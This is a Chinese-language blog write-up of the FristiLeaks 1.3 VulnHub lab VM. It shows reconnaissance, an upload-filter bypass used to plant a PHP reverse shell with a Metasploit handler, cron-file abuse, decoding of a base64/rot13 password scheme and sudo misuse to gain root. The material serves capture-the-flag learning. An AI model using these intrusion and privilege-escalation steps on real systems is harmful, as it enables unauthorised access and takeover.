Venture's BlogHomeAboutArchivesTagsCategories
FristiLeaks 1.3 VulnHub Writeup

Description:

A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..

NOTE:设置是需要把虚拟机的mac地址改为08:00:27:A5:A6:76
虚拟机打开是这个样子
mark
目标是成为root用户并拿到flag

信息收集

首先是寻找目标机

nmap -sn 192.168.224。

root@kali:~# nmap -sn 192.168.224.0/24
Starting Nmap 7.40 ( https://nmap.org ) 
Nmap scan report for 192.168.224.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.224.2
Host is up (0.00016s latency).
MAC Address: 00:50:56:FD:70:F2 (VMware)
Nmap scan report for 192.168.224.135
Host is up (0.00016s latency).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.224.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:FB:7A:70 (VMware)
Nmap scan report for 192.168.224.136
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.71 seconds

发现目标主机在192.168.224.135,对目标主机进行扫描

nmap -sS -sV -T4 -A -O 192.168.224.135

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Starting Nmap 7.40 ( https://nmap.org )
Nmap scan report for 192.168.224.135
Host is up (0.0016s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries 
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Network Distance: 1 hop

得到的信息是80端口开启,并且是Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3),还有robots.txt

查找突破点

首先浏览web网站

mark

查看robots.txt,进入给出的三个目录,但只得到一张相同的图片

mark

似乎并没有什么用,但是注意到这三个名字都为饮品,而结合首页的keep calm and drink fristi,尝试/fristi

mark

成功得到一个登陆页面! :)查看源代码

mark

看到一段注释,是eezeepz留下的,而之后出现的图片被base64编码,而在后面有一段注释的代码,同样试试base64,解出来是一张似乎是密码的图片

mark

使用eezeepz作为username成功登陆

可以上传文件了

mark

不过进行了简单的过滤,只能上传png,jpg,gif,修改后缀名就能绕过

利用

添加.jpg后缀,上传反向shell,设置监听

1
2
3
4
5
6
7
8
9
10
11
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.224.136
lhost => 192.168.224.136
msf exploit(handler) > set lport 445
lport => 445
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.224.136:445 
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.224.135
[*] Meterpreter session 1 opened (192.168.224.136:445 -> 192.168.224.135:57657) at 2018-02-14 17:34:28 +0800

1
2
3
4
5
6
7
meterpreter > shell
Process 5305 created.
Channel 0 created.
id
uid=48(apache) gid=48(apache) groups=48(apache)
pwd
/var/www/html/fristi/uploads

文件比较多,一级一级查看,在/var/www 中发现有一个notes.txt

1
2
3
4
5
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry

于是去查看home目录中的eezeepz,在里面同样发现了一个notes.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.
- Jerry

提示可以使用chmod, df, cat, echo, ps, grep, egrep 命令,并要在/tmp/创建runthis文件,之后会出现cronresult文件,并用他的权限执行

想要去查看admin的内容可以利用chmod 修改权限

1
2
3
4
5
6
7
8
9
echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
ls
cronresult
runthis
cat cronresult 
executing: /home/admin/chmod 777 /home/admin
executing: /home/admin/chmod 777 /home/admin
executing: /home/admin/chmod 777 /home/admin
executing: /home/admin/chmod 777 /home/admin

可以进入admin了

1
2
3
4
5
6
7
8
9
10
11
12
13
cd admin
ls
cat
chmod
cronjob.py
cryptedpass.txt
cryptpass.py
df
echo
egrep
grep
ps
whoisyourgodnow.txt

cryptedpass.txt

1
mVGZ3O3omkJLmy2pcuTq

cryptpass.py

1
2
3
4
5
6
7
8
9
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult

whoisyourgodnow.txt

1
=RFn0AKnlMHMPIzpyuTI0ITG

看来密码是经过一个加密,新base64加密,再用倒序的字符串进行rot13加密

解密分别得到

1
2
thisisalsopw123
LetThereBeFristi!

这可能是另一个用户fristigod 的密码

这里采用su - 切换是出现了问题,提示standard in must be a tty
查找资料可以用python模拟一个虚拟终端解决 python -c ‘import pty;pty.spawn(“/bin/sh”)’
原因是因为su(还有sudo)命令不是一个简单的进程,出于安全的考虑,linux要求用户必须从终端设备(tty)中输入密码,而不是标准输入(stdin)。换句话说,sudo在你输入密码的时候本质上是读取了键盘,而不是bash里面输入的字符。因此为了能够输入密码,我们必须模拟一个终端设备。

1
2
3
4
python -c 'import pty;pty.spawn("/bin/sh")'
sh-4.1$ su - fristigod
su - fristigod
Password: LetThereBeFristi!

成功进入fristigod账户

1
2
3
4
5
6
7
8
-bash-4.1$ pwd
pwd
/var/fristigod
-bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
-bash-4.1$ ls 
ls

不过也不是root,并且没有东西,-al 试试

1
2
3
4
5
6
7
-bash-4.1$ ls -al
ls -al
total 16
drwxr-x---   3 fristigod fristigod 4096 Nov 25  2015 .
drwxr-xr-x. 19 root      root      4096 Nov 19  2015 ..
-rw-------   1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4096 Nov 25  2015 .secret_admin_stuff
1
2
3
4
5
6
7
-bash-4.1$ cd .se	
cd .-bash-4.1$ ls -al
ls -al
total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25  2015 .
drwxr-x---  3 fristigod fristigod 4096 Nov 25  2015 ..
-rwsr-sr-x  1 root      root      7529 Nov 25  2015 doCom

doCom没有权限,查看历史命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
-bash-4.1$ cat .bash_history
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

可见fristigod 大多使用sudo命令,同样试试sudo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
-bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

根据提示,尝试

1
2
3
-bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Usage: ./program_name terminal_command ...-bash-4.1$

创建shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
bash-4.1# cd /root
cd /root
bash-4.1# ls
ls
fristileaks_secrets.txt
bash-4.1# cat fri	
cat fristileaks_secrets.txt 
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1

得到flag,完成

总结

关于Linux中tty、pty、pts

1> tty(终端设备的统称):
tty一词源于Teletypes,或teletypewriters,原来指的是电传打字机,是通过串行线用打印机键盘通过阅读和发送信息的东西,后来这东西被键盘和显示器取代,所以现在叫终端比较合适。
终端是一种字符型设备,他有多种类型,通常使用tty来简称各种类型的终端设备。
> pty(虚拟终端):
但是假如我们远程telnet到主机或使用xterm时不也需要一个终端交互么?是的,这就是虚拟终端pty(pseudo-tty)
> pts/ptmx(pts/ptmx结合使用,进而实现pty):
s(pseudo-terminal slave)是pty的实现方法,和ptmx(pseudo-terminal master)配合使用实现pty。

参考

http://blog.sina.com.cn/s/blog_638ac15c01012e0v.html

https://g0blin.co.uk/fristileaks-1-3-vulnhub-writeup/#-cola-sisi-and-beer

来源

结束:)

文章作者: Venture
文章链接: http://yoursite.com/2018/02/19/Fristileaks 1.3/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Venture's Blog